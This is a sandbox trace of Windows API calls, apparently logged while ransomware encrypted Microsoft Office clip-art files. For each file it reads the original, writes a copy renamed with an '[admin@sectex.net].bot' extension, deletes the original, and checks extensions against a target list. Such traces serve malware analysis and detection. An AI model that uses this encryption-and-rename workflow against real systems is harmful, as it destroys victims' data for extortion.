	[0161.572] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107426.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107426.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0161.572] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107426.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107426.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0161.572] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.572] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.572] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107426.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107426.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0161.573] GetLastError () returned 0x0
	[0161.573] ReadFile (in: hFile=0x388, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x2ce4, lpOverlapped=0x0) returned 1
	[0162.157] WriteFile (in: hFile=0x3d0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x2cf0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x2cf0, lpOverlapped=0x0) returned 1
	[0162.161] ReadFile (in: hFile=0x388, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0162.161] WriteFile (in: hFile=0x3d0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0162.161] SetEndOfFile (hFile=0x3d0) returned 1
	[0162.162] CloseHandle (hObject=0x3d0) returned 1
	[0162.162] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.162] SetEndOfFile (hFile=0x388) returned 1
	[0162.164] CloseHandle (hObject=0x388) returned 1
	[0162.164] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107426.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0162.164] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107426.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107426.wmf")) returned 1
	[0162.165] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107426.WMF") returned 63
	[0162.165] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107426.WMF") returned 63
	[0162.165] lstrlenW (lpString=".doc") returned 4
	[0162.165] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0162.165] lstrlenW (lpString=".docx") returned 5
	[0162.165] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0162.165] lstrlenW (lpString=".pdf") returned 4
	[0162.165] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0162.165] lstrlenW (lpString=".xls") returned 4
	[0162.166] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0162.166] lstrlenW (lpString=".xlsx") returned 5
	[0162.166] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0162.166] lstrlenW (lpString=".ppt") returned 4
	[0162.166] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0162.166] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107426.WMF") returned 63
	[0162.166] lstrlenW (lpString=".zip") returned 4
	[0162.166] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0162.166] lstrlenW (lpString=".rar") returned 4
	[0162.166] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0162.166] lstrlenW (lpString=".bz2") returned 4
	[0162.166] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0162.166] lstrlenW (lpString=".7z") returned 3
	[0162.166] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0162.166] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107426.WMF") returned 63
	[0162.166] lstrlenW (lpString=".dbf") returned 4
	[0162.166] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0162.166] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107426.WMF") returned 63
	[0162.166] lstrlenW (lpString=".1cd") returned 4
	[0162.166] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0162.166] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107426.WMF") returned 63
	[0162.166] lstrlenW (lpString=".jpg") returned 4
	[0162.166] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0162.166] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107426.WMF") returned 63
	[0162.166] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107426.WMF") returned 63
	[0162.166] lstrlenW (lpString=".doc") returned 4
	[0162.166] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0162.166] lstrlenW (lpString=".docx") returned 5
	[0162.166] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0162.166] lstrlenW (lpString=".pdf") returned 4
	[0162.166] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0162.167] lstrlenW (lpString=".xls") returned 4
	[0162.167] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0162.167] lstrlenW (lpString=".xlsx") returned 5
	[0162.167] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0162.167] lstrlenW (lpString=".ppt") returned 4
	[0162.167] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0162.167] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107426.WMF") returned 63
	[0162.167] lstrlenW (lpString=".zip") returned 4
	[0162.167] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0162.167] lstrlenW (lpString=".rar") returned 4
	[0162.167] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0162.167] lstrlenW (lpString=".bz2") returned 4
	[0162.167] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0162.167] lstrlenW (lpString=".7z") returned 3
	[0162.167] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0162.167] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107426.WMF") returned 63
	[0162.167] lstrlenW (lpString=".dbf") returned 4
	[0162.167] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0162.167] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107426.WMF") returned 63
	[0162.167] lstrlenW (lpString=".1cd") returned 4
	[0162.167] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0162.167] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107426.WMF") returned 63
	[0162.167] lstrlenW (lpString=".jpg") returned 4
	[0162.167] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0162.167] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0162.167] lstrlenW (lpString="J0107482.WMF") returned 12
	[0162.167] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107482.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107482.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0162.168] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=4980) returned 1
	[0162.168] CloseHandle (hObject=0x388) returned 1
	[0162.168] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107482.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107482.wmf")) returned 0x20
	[0162.168] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107482.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107482.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0162.169] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107482.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107482.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0162.169] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.169] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.169] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107482.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107482.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0162.170] GetLastError () returned 0x0
	[0162.170] ReadFile (in: hFile=0x388, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x1374, lpOverlapped=0x0) returned 1
	[0162.172] WriteFile (in: hFile=0x3d0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x1380, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x1380, lpOverlapped=0x0) returned 1
	[0162.172] ReadFile (in: hFile=0x388, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0162.173] WriteFile (in: hFile=0x3d0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0162.173] SetEndOfFile (hFile=0x3d0) returned 1
	[0162.173] CloseHandle (hObject=0x3d0) returned 1
	[0162.173] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.173] SetEndOfFile (hFile=0x388) returned 1
	[0162.175] CloseHandle (hObject=0x388) returned 1
	[0162.175] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107482.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0162.175] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107482.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107482.wmf")) returned 1
	[0162.176] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107482.WMF") returned 63
	[0162.176] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107482.WMF") returned 63
	[0162.176] lstrlenW (lpString=".doc") returned 4
	[0162.176] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0162.176] lstrlenW (lpString=".docx") returned 5
	[0162.176] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0162.176] lstrlenW (lpString=".pdf") returned 4
	[0162.176] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0162.176] lstrlenW (lpString=".xls") returned 4
	[0162.176] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0162.176] lstrlenW (lpString=".xlsx") returned 5
	[0162.176] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0162.176] lstrlenW (lpString=".ppt") returned 4
	[0162.176] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0162.176] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107482.WMF") returned 63
	[0162.176] lstrlenW (lpString=".zip") returned 4
	[0162.176] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0162.176] lstrlenW (lpString=".rar") returned 4
	[0162.176] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0162.176] lstrlenW (lpString=".bz2") returned 4
	[0162.176] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0162.176] lstrlenW (lpString=".7z") returned 3
	[0162.177] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0162.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107482.WMF") returned 63
	[0162.177] lstrlenW (lpString=".dbf") returned 4
	[0162.177] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0162.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107482.WMF") returned 63
	[0162.177] lstrlenW (lpString=".1cd") returned 4
	[0162.177] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0162.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107482.WMF") returned 63
	[0162.177] lstrlenW (lpString=".jpg") returned 4
	[0162.177] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0162.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107482.WMF") returned 63
	[0162.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107482.WMF") returned 63
	[0162.177] lstrlenW (lpString=".doc") returned 4
	[0162.177] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0162.177] lstrlenW (lpString=".docx") returned 5
	[0162.177] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0162.177] lstrlenW (lpString=".pdf") returned 4
	[0162.177] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0162.177] lstrlenW (lpString=".xls") returned 4
	[0162.177] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0162.177] lstrlenW (lpString=".xlsx") returned 5
	[0162.177] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0162.177] lstrlenW (lpString=".ppt") returned 4
	[0162.177] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0162.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107482.WMF") returned 63
	[0162.177] lstrlenW (lpString=".zip") returned 4
	[0162.177] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0162.177] lstrlenW (lpString=".rar") returned 4
	[0162.177] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0162.177] lstrlenW (lpString=".bz2") returned 4
	[0162.177] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0162.177] lstrlenW (lpString=".7z") returned 3
	[0162.178] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0162.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107482.WMF") returned 63
	[0162.178] lstrlenW (lpString=".dbf") returned 4
	[0162.178] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0162.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107482.WMF") returned 63
	[0162.178] lstrlenW (lpString=".1cd") returned 4
	[0162.178] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0162.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107482.WMF") returned 63
	[0162.178] lstrlenW (lpString=".jpg") returned 4
	[0162.178] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0162.178] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0162.178] lstrlenW (lpString="J0107484.WMF") returned 12
	[0162.178] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107484.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107484.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0162.181] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=3040) returned 1
	[0162.181] CloseHandle (hObject=0x388) returned 1
	[0162.182] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107484.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107484.wmf")) returned 0x20
	[0162.182] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107484.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107484.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0162.182] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107484.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107484.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0162.182] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.182] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.182] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107484.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107484.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0162.183] GetLastError () returned 0x0
	[0162.183] ReadFile (in: hFile=0x388, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0xbe0, lpOverlapped=0x0) returned 1
	[0162.185] WriteFile (in: hFile=0x3d0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xbf0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xbf0, lpOverlapped=0x0) returned 1
	[0162.186] ReadFile (in: hFile=0x388, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0162.186] WriteFile (in: hFile=0x3d0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0162.186] SetEndOfFile (hFile=0x3d0) returned 1
	[0162.186] CloseHandle (hObject=0x3d0) returned 1
	[0162.186] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.186] SetEndOfFile (hFile=0x388) returned 1
	[0162.188] CloseHandle (hObject=0x388) returned 1
	[0162.188] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107484.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0162.189] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107484.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107484.wmf")) returned 1
	[0162.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107484.WMF") returned 63
	[0162.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107484.WMF") returned 63
	[0162.189] lstrlenW (lpString=".doc") returned 4
	[0162.189] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0162.189] lstrlenW (lpString=".docx") returned 5
	[0162.189] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0162.190] lstrlenW (lpString=".pdf") returned 4
	[0162.190] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0162.190] lstrlenW (lpString=".xls") returned 4
	[0162.190] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0162.190] lstrlenW (lpString=".xlsx") returned 5
	[0162.190] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0162.190] lstrlenW (lpString=".ppt") returned 4
	[0162.190] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0162.190] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107484.WMF") returned 63
	[0162.190] lstrlenW (lpString=".zip") returned 4
	[0162.190] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0162.190] lstrlenW (lpString=".rar") returned 4
	[0162.190] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0162.190] lstrlenW (lpString=".bz2") returned 4
	[0162.190] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0162.190] lstrlenW (lpString=".7z") returned 3
	[0162.190] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0162.190] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107484.WMF") returned 63
	[0162.190] lstrlenW (lpString=".dbf") returned 4
	[0162.190] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0162.190] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107484.WMF") returned 63
	[0162.190] lstrlenW (lpString=".1cd") returned 4
	[0162.190] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0162.190] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107484.WMF") returned 63
	[0162.190] lstrlenW (lpString=".jpg") returned 4
	[0162.190] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0162.190] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107484.WMF") returned 63
	[0162.190] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107484.WMF") returned 63
	[0162.190] lstrlenW (lpString=".doc") returned 4
	[0162.190] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0162.190] lstrlenW (lpString=".docx") returned 5
	[0162.190] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0162.191] lstrlenW (lpString=".pdf") returned 4
	[0162.191] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0162.191] lstrlenW (lpString=".xls") returned 4
	[0162.191] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0162.191] lstrlenW (lpString=".xlsx") returned 5
	[0162.191] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0162.191] lstrlenW (lpString=".ppt") returned 4
	[0162.191] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0162.191] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107484.WMF") returned 63
	[0162.191] lstrlenW (lpString=".zip") returned 4
	[0162.191] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0162.191] lstrlenW (lpString=".rar") returned 4
	[0162.191] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0162.191] lstrlenW (lpString=".bz2") returned 4
	[0162.191] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0162.191] lstrlenW (lpString=".7z") returned 3
	[0162.191] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0162.191] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107484.WMF") returned 63
	[0162.191] lstrlenW (lpString=".dbf") returned 4
	[0162.191] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0162.191] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107484.WMF") returned 63
	[0162.191] lstrlenW (lpString=".1cd") returned 4
	[0162.191] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0162.191] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107484.WMF") returned 63
	[0162.191] lstrlenW (lpString=".jpg") returned 4
	[0162.191] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0162.191] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0162.191] lstrlenW (lpString="J0107488.WMF") returned 12
	[0162.192] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107488.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107488.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0162.192] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=8000) returned 1
	[0162.192] CloseHandle (hObject=0x388) returned 1
	[0162.192] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107488.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107488.wmf")) returned 0x20
	[0162.192] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107488.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107488.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
